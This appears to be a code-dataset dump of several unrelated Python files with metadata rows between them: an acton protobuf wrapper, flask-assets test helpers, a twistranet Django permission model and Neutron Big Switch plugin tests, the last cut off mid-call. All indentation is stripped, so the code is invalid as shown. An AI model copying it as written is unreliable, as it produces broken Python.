def __init__(self, proto: Union[str, acton_pb.Predictions]):
"""
Parameters
----------
proto
Path to .proto file, or raw protobuf itself.
"""
try:
self.proto = acton.proto.io.read_proto(
proto, acton_pb.Predictions)
except TypeError:
if isinstance(proto, acton_pb.Predictions):
self.proto = proto
else:
raise TypeError('proto should be str or Predictions protobuf.')
self._validate_proto()
self.db_kwargs = {kwa.key: json.loads(kwa.value)
for kwa in self.proto.db.kwarg}
if len(self.proto.db.label_encoder.encoding) > 0:
self.label_encoder = deserialise_encoder(
self.proto.db.label_encoder)
self.db_kwargs['label_encoder'] = self.label_encoder
else:
self.label_encoder = None
self._set_default()
@property
def DB(self) -> acton.database.Database:
"""Gets a database context manager for the specified database.
Returns
-------
type
Database context manager.
"""
if hasattr(self, '_DB'):
return self._DB
self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name](
self.proto.db.path, **self.db_kwargs)
return self._DB
@property
def predicted_ids(self) -> List[int]:
"""Gets a list of IDs corresponding to predictions.
Returns
-------
List[int]
List of IDs corresponding to predictions.
"""
if hasattr(self, '_predicted_ids'):
return self._predicted_ids
self._predicted_ids = [prediction.id
for prediction in self.proto.prediction]
return self._predicted_ids
@property
def labelled_ids(self) -> List[int]:
"""Gets a list of IDs the predictor knew the label for.
Returns
-------
List[int]
List of IDs the predictor knew the label for.
"""
if hasattr(self, '_labelled_ids'):
return self._labelled_ids
self._labelled_ids = list(self.proto.labelled_id)
return self._labelled_ids
@property
def predictions(self) -> numpy.ndarray:
"""Gets predictions array specified in input.
Notes
-----
The returned array is cached by this object so future calls will not
need to recompile the array.
Returns
-------
numpy.ndarray
T x N x D NumPy array of predictions.
"""
if hasattr(self, '_predictions'):
return self._predictions
self._predictions = []
for prediction in self.proto.prediction:
data = prediction.prediction
shape = (self.proto.n_predictors,
self.proto.n_prediction_dimensions)
self._predictions.append(
acton.proto.io.get_ndarray(data, shape, float))
self._predictions = numpy.array(self._predictions).transpose((1, 0, 2))
return self._predictions
def _validate_proto(self):
"""Checks that the protobuf is valid and enforces constraints.
Raises
------
ValueError
"""
if self.proto.n_predictors < 1:
raise ValueError('Number of predictors must be > 0.')
if self.proto.n_prediction_dimensions < 1:
raise ValueError('Prediction dimension must be > 0.')
validate_db(self.proto.db)
def _set_default(self):
"""Adds default parameters to the protobuf."""
@classmethod
def make(
cls: type,
predicted_ids: Iterable[int],
labelled_ids: Iterable[int],
predictions: numpy.ndarray,
db: acton.database.Database,
predictor: str='') -> 'Predictions':
"""Converts NumPy predictions to a Predictions object.
Parameters
----------
predicted_ids
Iterable of instance IDs corresponding to predictions.
labelled_ids
Iterable of instance IDs used to train the predictor.
predictions
T x N x D array of corresponding predictions.
predictor
Name of predictor used to generate predictions.
db
Database.
Returns
-------
Predictions
"""
proto = acton_pb.Predictions()
# Store single data first.
n_predictors, n_instances, n_prediction_dimensions = predictions.shape
proto.n_predictors = n_predictors
proto.n_prediction_dimensions = n_prediction_dimensions
proto.predictor = predictor
# Store the database.
proto.db.CopyFrom(db.to_proto())
# Store the predictions array. We can do this by looping over the
# instances.
for id_, prediction in zip(
predicted_ids, predictions.transpose((1, 0, 2))):
prediction_ = proto.prediction.add()
prediction_.id = int(id_) # numpy.int64 -> int
prediction_.prediction.extend(prediction.ravel())
# Store the labelled IDs.
for id_ in labelled_ids:
# int() here takes numpy.int64 to int, for protobuf compatibility.
proto.labelled_id.append(int(id_))
return cls(proto)
@classmethod
def deserialise(cls, proto: bytes, json: bool=False) -> 'Predictions':
"""Deserialises a protobuf into Predictions.
Parameters
----------
proto
Serialised protobuf.
json
Whether the serialised protobuf is in JSON format.
Returns
-------
Predictions
"""
if not json:
predictions = acton_pb.Predictions()
predictions.ParseFromString(proto)
return cls(predictions)
return cls(json_format.Parse(proto, acton_pb.Predictions()))
class Recommendations(object):
"""Wrapper for the Recommendations protobuf.
Attributes
----------
proto : acton_pb.Recommendations
Protobuf representing recommendations.
db_kwargs : dict
Key-value pairs of keyword arguments for the database constructor.
label_encoder : sklearn.preprocessing.LabelEncoder
Encodes labels as integers. May be None.
"""
def __init__(self, proto: Union[str, acton_pb.Recommendations]):
"""
Parameters
----------
proto
Path to .proto file, or raw protobuf itself.
"""
try:
self.proto = acton.proto.io.read_proto(
proto, acton_pb.Recommendations)
except TypeError:
if isinstance(proto, acton_pb.Recommendations):
self.proto = proto
else:
raise TypeError(
'proto should be str or Recommendations protobuf.')
self._validate_proto()
self.db_kwargs = {kwa.key: json.loads(kwa.value)
for kwa in self.proto.db.kwarg}
if len(self.proto.db.label_encoder.encoding) > 0:
self.label_encoder = deserialise_encoder(
self.proto.db.label_encoder)
self.db_kwargs['label_encoder'] = self.label_encoder
else:
self.label_encoder = None
self._set_default()
@classmethod
def deserialise(cls, proto: bytes, json: bool=False) -> 'Recommendations':
"""Deserialises a protobuf into Recommendations.
Parameters
----------
proto
Serialised protobuf.
json
Whether the serialised protobuf is in JSON format.
Returns
-------
Recommendations
"""
if not json:
recommendations = acton_pb.Recommendations()
recommendations.ParseFromString(proto)
return cls(recommendations)
return cls(json_format.Parse(proto, acton_pb.Recommendations()))
@property
def DB(self) -> acton.database.Database:
"""Gets a database context manager for the specified database.
Returns
-------
type
Database context manager.
"""
if hasattr(self, '_DB'):
return self._DB
self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name](
self.proto.db.path, **self.db_kwargs)
return self._DB
@property
def recommendations(self) -> List[int]:
"""Gets a list of recommended IDs.
Returns
-------
List[int]
List of recommended IDs.
"""
if hasattr(self, '_recommendations'):
return self._recommendations
self._recommendations = list(self.proto.recommended_id)
return self._recommendations
@property
def labelled_ids(self) -> List[int]:
"""Gets a list of labelled IDs.
Returns
-------
List[int]
List of labelled IDs.
"""
if hasattr(self, '_labelled_ids'):
return self._labelled_ids
self._labelled_ids = list(self.proto.labelled_id)
return self._labelled_ids
def _validate_proto(self):
"""Checks that the protobuf is valid and enforces constraints.
Raises
------
ValueError
"""
validate_db(self.proto.db)
def _set_default(self):
"""Adds default parameters to the protobuf."""
@classmethod
def make(
cls: type,
recommended_ids: Iterable[int],
labelled_ids: Iterable[int],
recommender: str,
db: acton.database.Database) -> 'Recommendations':
"""Constructs a Recommendations.
Parameters
----------
recommended_ids
Iterable of recommended instance IDs.
labelled_ids
Iterable of labelled instance IDs used to make recommendations.
recommender
Name of the recommender used to make recommendations.
db
Database.
Returns
-------
Recommendations
"""
proto = acton_pb.Recommendations()
# Store single data first.
proto.recommender = recommender
# Store the IDs.
for id_ in recommended_ids:
proto.recommended_id.append(id_)
for id_ in labelled_ids:
proto.labelled_id.append(id_)
# Store the database.
proto.db.CopyFrom(db.to_proto())
return cls(proto)
| bsd-3-clause | -1,972,909,586,038,859,800 | 27.202401 | 79 | 0.562827 | false |
miracle2k/flask-assets | tests/helpers.py | 1 | 1105 | from flask.app import Flask
from webassets.test import TempEnvironmentHelper as BaseTempEnvironmentHelper
from flask_assets import Environment
try:
from flask import Blueprint
Module = None
except ImportError:
# Blueprints only available starting with 0.7,
# fall back to old Modules otherwise.
Blueprint = None
from flask import Module
__all__ = ('TempEnvironmentHelper', 'Module', 'Blueprint')
class TempEnvironmentHelper(BaseTempEnvironmentHelper):
def _create_environment(self, **kwargs):
if not hasattr(self, 'app'):
self.app = Flask(__name__, static_folder=self.tempdir, **kwargs)
self.env = Environment(self.app)
return self.env
try:
from test.test_support import check_warnings
except ImportError:
# Python < 2.6
import contextlib
@contextlib.contextmanager
def check_warnings(*filters, **kwargs):
# We cannot reasonably support this, we'd have to copy to much code.
# (or write our own). Since this is only testing warnings output,
# we might slide by ignoring it.
yield
| bsd-2-clause | 1,334,822,051,698,322,400 | 28.078947 | 77 | 0.694118 | false |
numericube/twistranet | twistranet/twistapp/models/twistable.py | 1 | 31887 | """
Base of the securable (ie. directly accessible through the web), translatable and full-featured TN object.
A twist-able object in TN is an object which can be accessed safely from a view.
Normally, everything a view manipulates must be taken from a TN object.
Content, Accounts, MenuItems, ... are all Twistable objects.
This abstract class provides a lot of little tricks to handle view/model articulation,
such as the slug management, prepares translation management and so on.
"""
import re
import inspect
import logging
import traceback
from django.db import models
from django.db.models import Q, loading
from django.db.utils import DatabaseError
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError, PermissionDenied, ObjectDoesNotExist
from django.utils.safestring import mark_safe
from twistranet.twistapp.lib.log import log
from twistranet.twistapp.lib import roles, permissions
from twistranet.twistapp.lib.slugify import slugify
from twistranet.twistapp.signals import twistable_post_save
from fields import ResourceField, PermissionField, TwistableSlugField
class TwistableManager(models.Manager):
"""
It's the base of the security model!!
"""
# Disabled for performance reasons.
# use_for_related_fields = True
def get_query_set(self, __account__ = None, request = None, ):
"""
Return a queryset of 100%-authorized objects. All (should) have the can_list perm to True.
This is in fact a kind of 'has_permission(can_list)' method!
This method IS very slow. But you can speed things up if you pass either 'request' or '__account__' along the lines.
Be aware, however, that in this case you loose the 'safety belt' provided by the security model.
"""
# Check for anonymous query
import community, account, community
__account__ = self._getAuthenticatedAccount(__account__, request)
base_query_set = super(TwistableManager, self).get_query_set()
# System account: return all objects without asking any question. And with all permissions set.
if __account__.id == account.SystemAccount.SYSTEMACCOUNT_ID:
return base_query_set
# XXX TODO: Make a special query for admin members? Or at least mgrs of the global community?
# XXX Make this more efficient?
# XXX Or, better, check if current user is manager of the owner ?
if __account__.id > 0:
managed_accounts = [__account__.id, ]
else:
managed_accounts = []
# XXX This try/except is there so that things don't get stucked during boostrap
try:
if __account__.is_admin:
return base_query_set.filter(
_p_can_list__lte = roles.manager,
)
except DatabaseError:
log.warning("DB error while checking AdminCommunity. This is NORMAL during syncdb or bootstrap.")
return base_query_set
# Regular check. Works for anonymous as well...
# network_ids = __account__.network_ids
if not __account__.is_anonymous:
qs = base_query_set.filter(
Q(
owner__id = __account__.id,
_p_can_list = roles.owner,
) | Q(
_access_network__targeted_network__target = __account__,
_p_can_list = roles.network,
) | Q(
_access_network__targeted_network__target = __account__,
_p_can_list = roles.public,
) | Q(
# Anonymous stuff
_access_network__isnull = True,
_p_can_list = roles.public,
)
)
else:
# Anon query. Easy: We just return public stuff.
# Warning: nested query is surely inefficient...
free_access_network = Twistable.objects.__booster__.filter(
_access_network__isnull = True,
_p_can_list = roles.public,
)
qs = base_query_set.filter(
Q(
# Strictly anonymous stuff
_access_network__isnull = True,
_p_can_list = roles.public,
) | Q(
# Incidently anonymous stuff (public stuff published by an anon account)
_access_network__isnull = False,
_access_network__id__in = free_access_network,
_p_can_list = roles.public,
)
)
return qs
def getCurrentAccount(self, request):
"""
The official and hassle-free method of getting the currently auth account from a view.
Just pass the request object.
"""
from account import Account, AnonymousAccount, UserAccount
u = getattr(request, 'user', None)
if isinstance(u, User):
# We use this instead of the get_profile() method to avoid an infinite recursion here.
# We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object
if not hasattr(u, '_account_cache'):
u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id)
u._account_cache.user = u
return u._account_cache
# Didn't find anything. We must be anonymous.
return AnonymousAccount()
def _getAuthenticatedAccount(self, __account__ = None, request = None):
"""
Dig the stack to find the authenticated account object.
Return either a (possibly generic) account object or None.
Views with a "request" parameter magically works with that.
If you want to use a system account, declare a '__account__' variable in your caller function.
"""
from account import Account, AnonymousAccount, UserAccount
# If we have the __account__ object, then it's quite obvious here...
if isinstance(__account__, Account):
return __account__
# If we have the request object, then we just can use getCurrentAccount() instead
if request:
return self.getCurrentAccount(request)
# We dig into the stack frame to find the request object.
frame = inspect.currentframe()
try:
while frame:
frame_members = dict(inspect.getmembers(frame))
# Inspect 'locals' variables to get the request or __account__
_locals = frame_members.get('f_locals', None)
if _locals:
# Check for an __acount__ variable holding a generic Account object. It always has precedence over 'request'
if _locals.has_key('__account__') and isinstance(_locals['__account__'], Account):
return _locals['__account__']
# Check for a request.user User object
if _locals.has_key('request'):
u = getattr(_locals['request'], 'user', None)
if isinstance(u, User):
# We use this instead of the get_profile() method to avoid an infinite recursion here.
# We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object
if not hasattr(u, '_account_cache'):
u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id)
u._account_cache.user = u
return u._account_cache
# Get back to the upper frame
frame = frame_members.get('f_back', None)
# Didn't find anything. We must be anonymous.
return AnonymousAccount()
finally:
# Avoid circular refs
frame = None
stack = None
del _locals
# Backdoor for performance purposes. Use it at your own risk as it breaks security.
@property
def __booster__(self):
return super(TwistableManager, self).get_query_set()
@property
def can_create(self,):
auth = self._getAuthenticatedAccount()
return not auth.is_anonymous
class _AbstractTwistable(models.Model):
"""
We use this abstract class to enforce use of our manager in all our subclasses.
"""
objects = TwistableManager()
class Meta:
abstract = True
class Twistable(_AbstractTwistable):
"""
Base (an abstract) type for rich, inheritable and securable TN objects.
This class is quite optimal when using its base methods but you should always use
your dereferenced class when you can do so!
All Content and Account classes derive from this.
XXX TODO: Securise the base manager!
"""
# Object management. Slug is optional (id is not ;))
slug = TwistableSlugField(unique = True, db_index = True, null = True, blank = True)
# This is a way to de-reference the underlying model rapidly
app_label = models.CharField(max_length = 64, db_index = True)
model_name = models.CharField(max_length = 64, db_index = True)
# Text representation of this content
# Usually a twistable is represented that way:
# (pict) TITLE
# Description [Read more]
# Basic metadata shared by all Twist objects.
# Title is mandatory!
title = models.CharField(max_length = 255, blank = True, default = '')
description = models.TextField(max_length = 1024, blank = True, default = '')
created_at = models.DateTimeField(auto_now_add = True, null = True, db_index = False)
modified_at = models.DateTimeField(auto_now = True, null = True, db_index = True)
created_by = models.ForeignKey("Account", related_name = "created_twistables", db_index = True, )
modified_by = models.ForeignKey("Account", null = True, related_name = "modified_twistables", db_index = True, )
# Picture management.
# If None, will use the default_picture_resource_slug attribute.
# If you want to get the account picture, use the 'picture' attribute.
default_picture_resource_slug = None
# XXX TODO PJ : the widget params are never rendered
picture = ResourceField( media_type='image', null = True, blank = True, related_name = "picture_of")
tags = models.ManyToManyField("Tag", related_name = "tagged")
# These are two security flags.
# The account this content is published for. 'NULL' means visible to AnonymousAccount.
publisher = models.ForeignKey("Account", null = True, blank = True, related_name = "published_twistables", db_index = True, )
# Security / Role shortcuts. These are the ppl/account the Owner / Network are given to.
# The account this object belongs to (ie. the actual author)
owner = models.ForeignKey("Account", related_name = "by", db_index = True, )
# Our security model.
permission_templates = () # Define this in your subclasses
permissions = PermissionField(db_index = True)
_access_network = models.ForeignKey("Account", null = True, blank = True, related_name = "+", db_index = True, )
# Scoring information. This is stored directly on the object for performance reasons.
# Should be updated by BATCH, not necessarily 'live' (for perf reasons as well).
static_score = models.IntegerField(default = 0)
# The permissions. It's strongly forbidden to edit those roles by hand, use the 'permissions' property instead.
_p_can_view = models.IntegerField(default = 16, db_index = True)
_p_can_edit = models.IntegerField(default = 16, db_index = True)
_p_can_list = models.IntegerField(default = 16, db_index = True)
_p_can_list_members = models.IntegerField(default = 16, db_index = True)
_p_can_publish = models.IntegerField(default = 16, db_index = True)
_p_can_join = models.IntegerField(default = 16, db_index = True)
_p_can_leave = models.IntegerField(default = 16, db_index = True)
_p_can_create = models.IntegerField(default = 16, db_index = True)
# Other configuration stuff (class-wise)
_ALLOW_NO_PUBLISHER = False # Prohibit creation of an object of this class with publisher = None.
_FORCE_SLUG_CREATION = True # Force creation of a slug if it doesn't exist
@property
def kind(self):
"""
Return the kind of object it is (as a lower-cased string).
"""
from twistranet.twistapp.models import Content, Account, Community, Resource
from twistranet.tagging.models import Tag
mc = self.model_class
if issubclass(mc, Content):
return 'content'
elif issubclass(mc, Community):
return 'community'
elif issubclass(mc, Account):
return 'account'
elif issubclass(mc, Resource):
return 'resource'
elif issubclass(mc, Tag):
return 'tag'
raise NotImplementedError("Can't get twistable category for object %s" % self)
@models.permalink
def get_absolute_url(self):
"""
return object absolute_url
"""
category = self.kind
viewbyslug = '%s_by_slug' % category
viewbyid = '%s_by_id' % category
if hasattr(self, 'slug'):
if self.slug:
return (viewbyslug, [self.slug])
return (viewbyid, [self.id])
@property
def html_link(self,):
"""
Return a pretty HTML anchor tag
"""
d = {
'label': self.title_or_description,
'url': self.get_absolute_url(),
}
return u"""<a href="%(url)s" title="%(label)s">%(label)s</a>""" % d
@property
def forced_picture(self,):
"""
Return actual picture for this content or default picture if not available.
May return None!
XXX SHOULD CACHE THIS
"""
import resource
if issubclass(self.model_class, resource.Resource):
return self.object
try:
picture = self.picture
if picture is None:
raise resource.Resource.DoesNotExist()
except resource.Resource.DoesNotExist:
try:
picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug)
except resource.Resource.DoesNotExist:
return None
return picture
def get_thumbnail(self, *args, **kw):
"""
Same arguments as sorl's get_thumbnail method.
"""
from sorl.thumbnail import default
try:
return default.backend.get_thumbnail(self.forced_picture.image, *args, **kw)
except:
# in rare situations (CMJK + PNG mode, sorl thumbnail raise an error)
import resource
picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug)
return default.backend.get_thumbnail(picture.image, *args, **kw)
@property
def thumbnails(self,):
"""
Return a dict of standard thumbnails methods.
XXX TODO: Cache this! And use lazy resolution!
Some day resources will be able to have several DIFFERENT previews...
Preview: Max = 500x500; Used when a large version should be available.
Summary: Max = 100x100;
Summary Preview: Max = Min = 100x100;
Medium: Max = Min = 50x50;
Icon: Max = Min = 16x16;
"""
return {
"preview": self.get_thumbnail("500x500", crop = "", upscale = False),
"summary": self.get_thumbnail("100x100", crop = "", upscale = False),
"summary_preview": self.get_thumbnail("100x100", crop = "center top", upscale = True),
"medium": self.get_thumbnail("50x50", crop = "center top", upscale = True),
"big_icon": self.get_thumbnail("32x32", upscale = False),
"icon": self.get_thumbnail("16x16", crop = "center top", upscale = True),
}
# #
# Internal management, ensuring DB consistancy #
# #
def save(self, *args, **kw):
"""
Set various object attributes
"""
import account
import community
auth = Twistable.objects._getAuthenticatedAccount()
# Check if we're saving a real object and not a generic Content one (which is prohibited).
# This must be a programming error, then.
if self.__class__.__name__ == Twistable.__name__:
raise ValidationError("You cannot save a raw content object. Use a derived class instead.")
# Set information used to retreive the actual subobject
self.model_name = self._meta.object_name
self.app_label = self._meta.app_label
# Set owner, publisher upon object creation. Publisher is NEVER set as None by default.
if self.id is None:
# If self.owner is already set, ensure it's done by SystemAccount
if self.owner_id:
if not isinstance(auth, account.SystemAccount):
raise PermissionDenied("You're not allowed to set the content owner by yourself.")
else:
self.owner = self.getDefaultOwner()
if not self.publisher_id:
self.publisher = self.getDefaultPublisher()
else:
if not self.publisher.can_publish:
raise PermissionDenied("You're not allowed to publish on %s" % self.publisher)
else:
# XXX TODO: Check that nobody sets /unsets the owner or the publisher of an object
# raise PermissionDenied("You're not allowed to set the content owner by yourself.")
if not self.can_edit:
raise PermissionDenied("You're not allowed to edit this content.")
# Set created_by and modified_by fields
if self.id is None:
self.created_by = auth
self.modified_by = auth
# Check if publisher is set. Only GlobalCommunity may have its publisher to None to make a site visible on the internet.
if not self.publisher_id:
if not self.__class__._ALLOW_NO_PUBLISHER:
raise ValueError("Only the Global Community can have no publisher, not %s" % self)
# Set permissions; we will apply them last to ensure we have an id.
# We also ensure that the right permissions are set on the right object
if not self.permissions:
perm_template = self.model_class.permission_templates
if not perm_template:
raise ValueError("permission_templates not defined on class %s" % self.__class__.__name__)
self.permissions = perm_template.get_default()
tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.permissions ]
if not tpl:
# Didn't find? We restore default setting. XXX Should log/alert something here!
tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.model_class.permission_templates.get_default() ]
log.warning("Restoring default permissions. Problem here.")
log.warning("Unable to find %s permission template %s in %s" % (self, self.permissions, self.permission_templates.perm_dict))
if tpl[0].get("disabled_for_community") and issubclass(self.publisher.model_class, community.Community):
raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description))
elif tpl[0].get("disabled_for_useraccount") and issubclass(self.publisher.model_class, account.UserAccount):
raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description))
for perm, role in tpl[0].items():
if perm.startswith("can_"):
if callable(role):
role = role(self)
setattr(self, "_p_%s" % perm, role)
# Check if we're creating or not
created = not self.id
# Generate slug (or not !)
if not self.slug and self.__class__._FORCE_SLUG_CREATION:
if self.title:
self.slug = slugify(self.title)
elif self.description:
self.slug = slugify(self.description)
else:
self.slug = slugify(self.model_name)
self.slug = self.slug[:40]
if created and self.__class__._FORCE_SLUG_CREATION:
while Twistable.objects.__booster__.filter(slug = self.slug).exists():
match = re.search("_(?P<num>[0-9]+)$", self.slug)
if match:
root = self.slug[:match.start()]
num = int(match.groupdict()['num']) + 1
else:
root = self.slug
num = 1
self.slug = "%s_%i" % (root, num, )
# Perform a full_clean on the model just to be sure it validates correctly
self.full_clean()
# Save and update access network information
ret = super(Twistable, self).save(*args, **kw)
self._update_access_network()
# Send TN's post-save signal
twistable_post_save.send(sender = self.__class__, instance = self, created = created)
return ret
def _update_access_network(self, ):
"""
Update hierarchy of driven objects.
If save is False, won't save result (useful when save() is performed later).
"""
# No id => this twistable doesn't control anything, we pass. Value will be set AFTER saving.
import account, community
if not self.id:
raise ValueError("Can't set _access_network before saving the object.")
# Update current object. We save current access and determine the more restrictive _p_can_list access permission.
# Remember that a published content has its permissions determined by its publisher's can_VIEW permission!
_current_access_network = self._access_network
obj = self.object
if issubclass(obj.model_class, account.Account):
_p_can_list = self._p_can_list
else:
_p_can_list = max(self._p_can_list, self.publisher and self.publisher._p_can_view or roles.public)
# If restricted to content owner, no access network mentionned here.
if _p_can_list in (roles.owner, ):
self._access_network = None # XXX We have to double check this, esp. on the GlobalCommunity object.
# Network role: same as current network for an account, same as publisher's network for a content
elif _p_can_list == roles.network:
if issubclass(obj.model_class, account.Account):
self._access_network = obj
else:
self._access_network = self.publisher
# Public content (or so it seems)
elif _p_can_list == roles.public:
# GlobalCommunity special case: if can_list goes public, then we can unrestrict the _access_network
if issubclass(self.model_class, community.GlobalCommunity):
self._access_network = None # Let's go public!
else:
# Regular treatment
obj = obj.publisher
while obj:
if obj._p_can_list == roles.public:
if obj == obj.publisher:
# If an object is its own publisher (eg. GlobalCommunity),
# we avoid infinite recursions here.
break
obj = obj.publisher
elif obj._p_can_list in (roles.owner, roles.network, ):
self._access_network = obj
break
else:
raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj))
else:
raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj))
# Update this object itself without calling the save() method again
Twistable.objects.__booster__.filter(id = self.id).update(_access_network = self._access_network)
# Update dependant objects if current object's network changed for public role
Twistable.objects.__booster__.filter(
Q(_access_network__id = self.id) | Q(publisher = self.id),
_p_can_list = roles.public,
).exclude(id = self.id).update(_access_network = obj)
# This is an additional check to ensure that no _access_network = None object with _p_can_list|_p_can_view = public still remains
# glob = community.GlobalCommunity.get()
# Twistable.objects.__booster__.filter(
# _access_network__isnull = True,
# _p_can_list = roles.public
# ).update(_access_network = glob)
def delete(self,):
"""
Here we avoid deleting related object for nullabled ForeignKeys.
XXX This is bad 'cause if we use the Manager.delete() method, this won't get checked!!!
XXX We need to migrate to Django 1.3 ASAP to get this issue solved with the on_delete attribute.
Hack from http://djangosnippets.org/snippets/1231/
"""
self.clear_nullable_related()
super(Twistable, self).delete()
def clear_nullable_related(self):
"""
Recursively clears any nullable foreign key fields on related objects.
Django is hard-wired for cascading deletes, which is very dangerous for
us. This simulates ON DELETE SET NULL behavior manually.
"""
# Update picture__id
Twistable.objects.__booster__.filter(picture__id = self.id).update(
picture = None
)
@property
def model_class(self):
"""
Return the actual model's class.
This method issues no DB query.
"""
return loading.get_model(self.app_label, self.model_name)
@property
def object(self):
"""
Return the exact subclass this object belongs to.
IT MAY ISSUE DB QUERY, so you should always consider using model_class instead if you can.
This is quite complex actually: since we want like to minimize database overhead,
we can't allow a "Model.objects.get(id = x)" call.
So, instead, we walk through object inheritance to fetch the right attributes.
XXX TODO: This is where I can implement the can_view or can_list filter. See search results to understand why.
"""
if self.id is None:
raise RuntimeError("You can't get subclass until your object is saved in database.")
# Get model class directly
model = loading.get_model(self.app_label, self.model_name)
if isinstance(self, model):
return self
return model.objects.__booster__.get(id = self.id)
def __unicode__(self,):
"""
Return model_name: id (slug)
"""
if not self.app_label or not self.model_name:
return "Unsaved %s" % self.__class__
if not self.id:
return "Unsaved %s.%s" % (self.app_label, self.model_name, )
if self.slug:
return "%s.%s: %s (%i)" % (self.app_label, self.model_name, self.slug, self.id)
else:
return "%s.%s: %i" % (self.app_label, self.model_name, self.id)
@property
def title_or_description(self):
"""
Return either title or description (or slug) but avoid the empty string at all means.
The return value is considered HTML-safe.
"""
for attr in ('title', 'description', 'slug', 'id'):
v = getattr(self, attr, None)
if not v:
continue
if attr=='id':
v = str(v)
if not isinstance(v, unicode):
v = unicode(v, errors = 'ignore')
# important : to display description
# we always use wiki filter which apply a "mark_safe"
# but after a special treatment
if attr!='description':
return mark_safe(v)
return v
class Meta:
app_label = 'twistapp'
# #
# Security Management #
# #
# XXX TODO: Use a more generic approach? And some caching as well? #
# XXX Also, must check that permissions are valid for the given obj #
# #
def getDefaultOwner(self,):
"""
General case: owner is the auth account (or SystemAccount if not found?)
"""
return Twistable.objects._getAuthenticatedAccount()
def getDefaultPublisher(self,):
"""
General case: publisher is the auth account (or SystemAccount if not found?)
"""
return Twistable.objects._getAuthenticatedAccount()
@property
def can_view(self):
if not self.id: return True # Can always view an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_view, self)
@property
def can_delete(self):
if not self.id: return True # Can always delete an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_delete, self)
@property
def can_edit(self):
if not self.id: return True # Can always edit an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_edit, self)
@property
def can_publish(self):
"""
True if authenticated account can publish on the current account object
"""
if not self.id: return False # Can NEVER publish an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_publish, self)
@property
def can_list(self):
"""
Return true if the current account can list the current object.
"""
if not self.id: return True # Can always list an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_list, self)
# #
# Views relations #
# #
@property
def summary_view(self):
return self.model_class.type_summary_view
@property
def detail_view(self):
return self.model_class.type_detail_view
| agpl-3.0 | 8,492,852,835,539,124,000 | 43.911268 | 151 | 0.581365 | false |
beagles/neutron_hacking | neutron/tests/unit/bigswitch/test_restproxy_plugin.py | 1 | 13331 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Big Switch Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import nested
import mock
from oslo.config import cfg
import webob.exc
from neutron import context
from neutron.extensions import portbindings
from neutron.manager import NeutronManager
from neutron.tests.unit import _test_extension_portbindings as test_bindings
from neutron.tests.unit.bigswitch import fake_server
from neutron.tests.unit.bigswitch import test_base
from neutron.tests.unit import test_api_v2
import neutron.tests.unit.test_db_plugin as test_plugin
import neutron.tests.unit.test_extension_allowedaddresspairs as test_addr_pair
patch = mock.patch
class BigSwitchProxyPluginV2TestCase(test_base.BigSwitchTestBase,
test_plugin.NeutronDbPluginV2TestCase):
def setUp(self, plugin_name=None):
self.setup_config_files()
self.setup_patches()
if plugin_name:
self._plugin_name = plugin_name
super(BigSwitchProxyPluginV2TestCase, self).setUp(self._plugin_name)
self.port_create_status = 'BUILD'
class TestBigSwitchProxyBasicGet(test_plugin.TestBasicGet,
BigSwitchProxyPluginV2TestCase):
pass
class TestBigSwitchProxyV2HTTPResponse(test_plugin.TestV2HTTPResponse,
BigSwitchProxyPluginV2TestCase):
def test_failover_memory(self):
# first request causes failover so next shouldn't hit bad server
with self.network() as net:
kwargs = {'tenant_id': 'ExceptOnBadServer'}
with self.network(**kwargs) as net:
req = self.new_show_request('networks', net['network']['id'])
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
class TestBigSwitchProxyPortsV2(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_OVS
HAS_PORT_FILTER = False
def test_update_port_status_build(self):
with self.port() as port:
self.assertEqual(port['port']['status'], 'BUILD')
self.assertEqual(self.port_create_status, 'BUILD')
def _get_ports(self, netid):
return self.deserialize('json',
self._list_ports('json', netid=netid))['ports']
def test_rollback_for_port_create(self):
plugin = NeutronManager.get_plugin()
with self.subnet() as s:
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
kwargs = {'device_id': 'somedevid'}
# allow thread spawns for this patch
self.spawn_p.stop()
with self.port(subnet=s, **kwargs):
self.spawn_p.start()
plugin.evpool.waitall()
self.httpPatch.stop()
ports = self._get_ports(s['subnet']['network_id'])
#failure to create should result in port in error state
self.assertEqual(ports[0]['status'], 'ERROR')
def test_rollback_for_port_update(self):
with self.network() as n:
with self.port(network_id=n['network']['id'],
device_id='66') as port:
port = self._get_ports(n['network']['id'])[0]
data = {'port': {'name': 'aNewName', 'device_id': '99'}}
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self.new_update_request('ports',
